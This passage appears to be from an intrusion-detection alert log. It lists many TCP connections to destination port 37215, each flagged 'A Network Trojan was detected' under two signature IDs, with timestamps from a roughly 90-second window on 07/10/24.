                  Source Port:59876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594738
                  SID:2835222
                  Source Port:51578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2835222
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.748441
                  SID:2829579
                  Source Port:57198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126128
                  SID:2829579
                  Source Port:38264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.526657
                  SID:2829579
                  Source Port:52074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2835222
                  Source Port:56100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.481124
                  SID:2835222
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937541
                  SID:2829579
                  Source Port:55264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.761571
                  SID:2835222
                  Source Port:51308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.359500
                  SID:2829579
                  Source Port:42214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558615
                  SID:2835222
                  Source Port:55128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.419620
                  SID:2835222
                  Source Port:39196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.518988
                  SID:2829579
                  Source Port:45010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2829579
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2835222
                  Source Port:34204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.652301
                  SID:2835222
                  Source Port:50540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247062
                  SID:2829579
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2835222
                  Source Port:41908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.227623
                  SID:2829579
                  Source Port:47774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.709271
                  SID:2829579
                  Source Port:38676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564107
                  SID:2829579
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994858
                  SID:2835222
                  Source Port:56646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502645
                  SID:2835222
                  Source Port:40994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.914881
                  SID:2829579
                  Source Port:58920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2829579
                  Source Port:33788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776701
                  SID:2835222
                  Source Port:36724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970064
                  SID:2835222
                  Source Port:60562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811511
                  SID:2835222
                  Source Port:42988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.529678
                  SID:2829579
                  Source Port:56430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2829579
                  Source Port:43670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400529
                  SID:2835222
                  Source Port:34672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.522648
                  SID:2829579
                  Source Port:41650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.825233
                  SID:2835222
                  Source Port:54154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2829579
                  Source Port:36050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290826
                  SID:2835222
                  Source Port:55482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554051
                  SID:2835222
                  Source Port:36616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005447
                  SID:2829579
                  Source Port:33712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2829579
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:47024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.856939
                  SID:2835222
                  Source Port:43550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897111
                  SID:2829579
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527046
                  SID:2835222
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.544171
                  SID:2835222
                  Source Port:41326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514103
                  SID:2829579
                  Source Port:52622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.040433
                  SID:2829579
                  Source Port:41384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514839
                  SID:2835222
                  Source Port:36174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.354961
                  SID:2835222
                  Source Port:53626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2835222
                  Source Port:36438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.268037
                  SID:2835222
                  Source Port:43974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780112
                  SID:2829579
                  Source Port:39730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.181617
                  SID:2835222
                  Source Port:45826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.050369
                  SID:2835222
                  Source Port:45808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.885713
                  SID:2829579
                  Source Port:33280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384495
                  SID:2829579
                  Source Port:58064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.801694
                  SID:2829579
                  Source Port:46900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:55232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840118
                  SID:2829579
                  Source Port:54954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.983815
                  SID:2829579
                  Source Port:54150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.460068
                  SID:2829579
                  Source Port:49436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882504
                  SID:2829579
                  Source Port:47082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2829579
                  Source Port:55962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564654
                  SID:2829579
                  Source Port:49850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.863039
                  SID:2829579
                  Source Port:60286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.573174
                  SID:2835222
                  Source Port:33272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.641864
                  SID:2829579
                  Source Port:55054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.961698
                  SID:2835222
                  Source Port:47768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811589
                  SID:2829579
                  Source Port:48606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.582733
                  SID:2835222
                  Source Port:51334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2829579
                  Source Port:33562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.423950
                  SID:2835222
                  Source Port:36580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.732264
                  SID:2835222
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.655669
                  SID:2829579
                  Source Port:52622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.251804
                  SID:2835222
                  Source Port:41742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2835222
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857526
                  SID:2835222
                  Source Port:51774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2829579
                  Source Port:45824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.392716
                  SID:2835222
                  Source Port:48328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.976199
                  SID:2835222
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2835222
                  Source Port:33958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538394
                  SID:2829579
                  Source Port:39800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.976688
                  SID:2829579
                  Source Port:58144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.351608
                  SID:2829579
                  Source Port:49038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2829579
                  Source Port:47810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2835222
                  Source Port:42090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.781347
                  SID:2829579
                  Source Port:52232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.366891
                  SID:2829579
                  Source Port:42180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.551648
                  SID:2829579
                  Source Port:56880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.837661
                  SID:2835222
                  Source Port:49634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.847797
                  SID:2835222
                  Source Port:51020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.372114
                  SID:2829579
                  Source Port:35184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2829579
                  Source Port:36444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.577578
                  SID:2835222
                  Source Port:60184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2835222
                  Source Port:32924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2829579
                  Source Port:50018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.597070
                  SID:2829579
                  Source Port:42336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.871507
                  SID:2835222
                  Source Port:39418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2835222
                  Source Port:60052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842425
                  SID:2829579
                  Source Port:43260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.375701
                  SID:2835222
                  Source Port:58826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2829579
                  Source Port:54450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.054152
                  SID:2835222
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2835222
                  Source Port:54494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.768994
                  SID:2829579
                  Source Port:45720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2829579
                  Source Port:42306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.051351
                  SID:2829579
                  Source Port:48344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.724470
                  SID:2835222
                  Source Port:57196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730026
                  SID:2835222
                  Source Port:49790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2829579
                  Source Port:54738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.228376
                  SID:2829579
                  Source Port:60874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.863790
                  SID:2829579
                  Source Port:60698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.327851
                  SID:2835222
                  Source Port:48000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.790185
                  SID:2829579
                  Source Port:55678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.239917
                  SID:2829579
                  Source Port:43694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.172192
                  SID:2829579
                  Source Port:49444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.311200
                  SID:2835222
                  Source Port:38574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.900584
                  SID:2829579
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.861277
                  SID:2829579
                  Source Port:50928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2829579
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.632292
                  SID:2829579
                  Source Port:42698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847797
                  SID:2829579
                  Source Port:56304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.866031
                  SID:2829579
                  Source Port:57246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893533
                  SID:2829579
                  Source Port:44390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.767767
                  SID:2829579
                  Source Port:54656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.913087
                  SID:2835222
                  Source Port:56110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.755153
                  SID:2829579
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.009787
                  SID:2829579
                  Source Port:44608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.824818
                  SID:2829579
                  Source Port:51120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2829579
                  Source Port:40716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.609445
                  SID:2835222
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409731
                  SID:2835222
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.675135
                  SID:2835222
                  Source Port:55576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.168343
                  SID:2835222
                  Source Port:51566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.005995
                  SID:2829579
                  Source Port:39598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.263380
                  SID:2829579
                  Source Port:45244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.346180
                  SID:2829579
                  Source Port:58270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.281548
                  SID:2835222
                  Source Port:38162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.482034
                  SID:2829579
                  Source Port:40854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.972305
                  SID:2829579
                  Source Port:36874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879681
                  SID:2829579
                  Source Port:33702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2835222
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.588722
                  SID:2835222
                  Source Port:38216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.952903
                  SID:2835222
                  Source Port:42834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2835222
                  Source Port:40196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.644230
                  SID:2835222
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2835222
                  Source Port:46326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595631
                  SID:2829579
                  Source Port:47042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382333
                  SID:2829579
                  Source Port:49318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.882242
                  SID:2835222
                  Source Port:34928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.472271
                  SID:2829579
                  Source Port:51582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.566844
                  SID:2835222
                  Source Port:60990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811605
                  SID:2829579
                  Source Port:47638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.539948
                  SID:2835222
                  Source Port:58660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.601201
                  SID:2829579
                  Source Port:47700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2835222
                  Source Port:49526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.482835
                  SID:2835222
                  Source Port:53938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.043964
                  SID:2835222
                  Source Port:33132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939930
                  SID:2835222
                  Source Port:49730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.541812
                  SID:2829579
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.077497
                  SID:2829579
                  Source Port:55198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655825
                  SID:2835222
                  Source Port:56730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.613334
                  SID:2829579
                  Source Port:60188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.583365
                  SID:2835222
                  Source Port:44620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.906246
                  SID:2835222
                  Source Port:33588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.084191
                  SID:2835222
                  Source Port:58232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.578459
                  SID:2835222
                  Source Port:51028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.376307
                  SID:2829579
                  Source Port:43496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.530993
                  SID:2829579
                  Source Port:38394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.407360
                  SID:2835222
                  Source Port:33016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2835222
                  Source Port:54916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.769630
                  SID:2829579
                  Source Port:46496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.848965
                  SID:2829579
                  Source Port:51236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.809234
                  SID:2829579
                  Source Port:41578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.566781
                  SID:2829579
                  Source Port:47938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2835222
                  Source Port:41726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.686169
                  SID:2829579
                  Source Port:49948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.860909
                  SID:2835222
                  Source Port:33558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.799288
                  SID:2829579
                  Source Port:54766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.829838
                  SID:2835222
                  Source Port:41646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2835222
                  Source Port:44748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.896003
                  SID:2829579
                  Source Port:32958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.946420
                  SID:2835222
                  Source Port:57592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.823696
                  SID:2829579
                  Source Port:39758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669251
